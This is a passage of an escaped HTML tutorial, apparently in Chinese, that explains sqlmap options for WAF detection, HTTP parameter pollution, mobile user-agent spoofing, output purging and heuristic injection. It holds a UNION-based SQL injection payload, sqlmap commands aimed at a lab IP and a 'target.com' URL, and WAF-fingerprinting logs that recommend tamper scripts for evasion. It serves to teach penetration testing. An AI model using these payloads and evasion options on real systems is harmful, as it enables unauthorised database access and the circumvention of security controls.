Roman';\">WAF\/IPS\/IDS<span>\u4fdd\u62a4\u53ef\u80fd\u4f1a\u5bf9<\/span><span>sqlmap<\/span><span>\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270\uff0c\u5982\u679c\u6000\u7591\u76ee\u6807\u6709\u6b64\u9632\u62a4\u7684\u8bdd\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u6765\u6d4b\u8bd5\u3002&nbsp;<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u4f7f\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u53c2\u6570\u6765\u6ce8\u5165\u6d4b\u8bd5<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&amp;foobar=AND&nbsp;1=1&nbsp;UNION&nbsp;ALL&nbsp;SELECT&nbsp;1,2,3,table_name&nbsp;FROM&nbsp;information_schema.tables&nbsp;WHERE&nbsp;2&gt;1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u6709\u4fdd\u62a4\u7684\u8bdd\u53ef\u80fd\u8fd4\u56de\u7ed3\u679c\u4f1a\u4e0d\u540c\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B8%85%E7%90%86sqlmap%E7%9A%84UDFs%E5%92%8C%E8%A1%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;cleanup<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6e05\u9664<span>sqlmap<\/span><span>\u6ce8\u5165\u65f6\u4ea7\u751f\u7684<\/span><span>udf<\/span><span>\u4e0e\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%A6%81%E7%94%A8%E5%BD%A9%E8%89%B2%E8%BE%93%E5%87%BA\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u7981\u7528\u5f69\u8272\u8f93\u51fa<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;disable-coloring<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u5f69\u8272\u8f93\u51fa\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u7981\u6389\u5f69\u8272\u8f93\u51fa\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8%E6%8C%87%E5%AE%9A%E7%9A%84Google%E7%BB%93%E6%9E%9C%E9%A1%B5%E9%9D%A2\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;gpage<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4<span>sqlmap<\/span><span>\u4f7f\u7528\u524d<\/span><span>100<\/span><span>\u4e2a<\/span><span>URL<\/span><span>\u5730\u5740\u4f5c\u4e3a\u6ce8\u5165\u6d4b\u8bd5\uff0c\u7ed3\u5408\u6b64\u9009\u9879\uff0c\u53ef\u4ee5\u6307\u5b9a\u9875\u9762\u7684<\/span><span>URL<\/span><span>\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8HTTP%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-hpp<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">HTTP<span>\u53c2\u6570\u6c61\u67d3\u53ef\u80fd\u4f1a\u7ed5\u8fc7<\/span><span>WAF\/IPS\/IDS<\/span><span>\u4fdd\u62a4\u673a\u5236\uff0c\u8fd9\u4e2a\u5bf9<\/span><span>ASP\/IIS<\/span><span>\u4e0e<\/span><span>ASP.NET\/IIS<\/span><span>\u5e73\u53f0\u5f88\u6709\u6548\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95WAFIPSIDS%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;identify-waf<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u5c1d\u8bd5\u627e\u51fa<\/span><span>WAF\/IPS\/IDS<\/span><span>\u4fdd\u62a4\uff0c\u65b9\u4fbf\u7528\u6237\u505a\u51fa\u7ed5\u8fc7\u65b9\u5f0f\u3002\u76ee\u524d\u5927\u7ea6\u652f\u6301<\/span><span>30<\/span><span>\u79cd\u4ea7\u54c1\u7684\u8bc6\u522b\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\u5bf9\u4e00\u4e2a\u53d7\u5230<span>ModSecurity&nbsp;WAF<\/span><span>\u4fdd\u62a4\u7684<\/span><span>MySQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;identify-waf&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;testing&nbsp;connection&nbsp;to&nbsp;the&nbsp;target&nbsp;URL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;heuristics&nbsp;detected&nbsp;web&nbsp;page&nbsp;charset&nbsp;&#8216;ascii&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;using&nbsp;WAF&nbsp;scripts&nbsp;to&nbsp;detect&nbsp;backend&nbsp;WAF\/IPS\/IDS&nbsp;protection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;USP&nbsp;Secure&nbsp;Entry&nbsp;Server&nbsp;(United&nbsp;Security&nbsp;Providers)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;BinarySEC&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(BinarySEC)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;NetContinuum&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(NetContinuum\/Barracuda&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Hyperguard&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(art&nbsp;of&nbsp;defence&nbsp;Inc.)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Cisco&nbsp;ACE&nbsp;XML&nbsp;Gateway&nbsp;(Cisco&nbsp;Systems)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;TrafficShield&nbsp;(F5&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Teros\/Citrix&nbsp;Application&nbsp;Firewall&nbsp;Enterprise&nbsp;(Teros\/Citrix&nbsp;Systems)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;KONA&nbsp;Security&nbsp;Solutions&nbsp;(Akamai&nbsp;Technologies)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Incapsula&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Incapsula\/Imperva)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;CloudFlare&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(CloudFlare)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Barracuda&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Barracuda&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;webApp.secure&nbsp;(webScurity)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Proventia&nbsp;Web&nbsp;Application&nbsp;Security&nbsp;(IBM)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;declared&nbsp;web&nbsp;page&nbsp;charset&nbsp;&#8216;iso-8859-1&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;page&nbsp;not&nbsp;found&nbsp;(404)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;KS-WAF&nbsp;(Knownsec)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;NetScaler&nbsp;(Citrix&nbsp;Systems)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Jiasule&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Jiasule)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;WebKnight&nbsp;Application&nbsp;Firewall&nbsp;(AQTRONIX)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;AppWall&nbsp;(Radware)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;ModSecurity:&nbsp;Open&nbsp;Source&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Trustwave)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[CRITICAL]&nbsp;WAF\/IDS\/IPS&nbsp;identified&nbsp;&#8216;ModSecurity:&nbsp;Open&nbsp;Source&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Trustwave)&#8217;.&nbsp;Please&nbsp;consider&nbsp;usage&nbsp;of&nbsp;tamper&nbsp;scripts&nbsp;(option&nbsp;&#8216;&#8211;tamper&#8217;)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%A8%A1%E4%BB%BF%E6%99%BA%E8%83%BD%E6%89%8B%E6%9C%BA\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6a21\u4eff\u667a\u80fd\u624b\u673a<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;mobile<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u670d\u52a1\u7aef\u53ea\u63a5\u6536\u79fb\u52a8\u7aef\u7684\u8bbf\u95ee\uff0c\u6b64\u65f6\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a\u624b\u673a\u7684<span>User-Agent<\/span><span>\u6765\u6a21\u4eff\u624b\u673a\u767b\u9646\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php?id=1&#8221;&nbsp;&#8211;mobile<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;smartphone&nbsp;do&nbsp;you&nbsp;want&nbsp;sqlmap&nbsp;to&nbsp;imitate&nbsp;through&nbsp;HTTP&nbsp;User-Agent&nbsp;header?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Apple&nbsp;iPhone&nbsp;4s&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;BlackBerry&nbsp;9900<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Google&nbsp;Nexus&nbsp;7<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4]&nbsp;HP&nbsp;iPAQ&nbsp;6365<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[5]&nbsp;HTC&nbsp;Sensation<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[6]&nbsp;Nokia&nbsp;N97<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[7]&nbsp;Samsung&nbsp;Galaxy&nbsp;S<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%AE%89%E5%85%A8%E7%9A%84%E5%88%A0%E9%99%A4output%E7%9B%AE%E5%BD%95%E7%9A%84%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;purge-output<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u7684\u4e00\u4e9b\u6587\u4ef6\u8986\u76d6\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;&#8211;purge-output&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[INFO]&nbsp;purging&nbsp;content&nbsp;of&nbsp;directory&nbsp;&#8216;\/home\/user\/sqlmap\/output&#8217;&#8230;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;changing&nbsp;file&nbsp;attributes<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;writing&nbsp;random&nbsp;data&nbsp;to&nbsp;files<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;truncating&nbsp;files<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;renaming&nbsp;filenames&nbsp;to&nbsp;random&nbsp;values<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;renaming&nbsp;directory&nbsp;names&nbsp;to&nbsp;random&nbsp;values<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;deleting&nbsp;the&nbsp;whole&nbsp;directory&nbsp;tree<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%90%AF%E5%8F%91%E5%BC%8F%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;smart<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u5bf9\u76ee\u6807\u975e\u5e38\u591a\u7684<span>URL<\/span><span>\u8fdb\u884c\u6d4b\u8bd5\uff0c\u4e3a\u8282\u7701\u65f6\u95f4\uff0c\u53ea\u5bf9\u80fd\u591f\u5feb\u901f\u5224\u65ad\u4e3a\u6ce8\u5165\u7684\u62a5\u9519\u70b9\u8fdb\u884c\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?ca=17&amp;user=foo&amp;id=1&#8221;&nbsp;&#8211;batch&nbsp;&#8211;smart<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 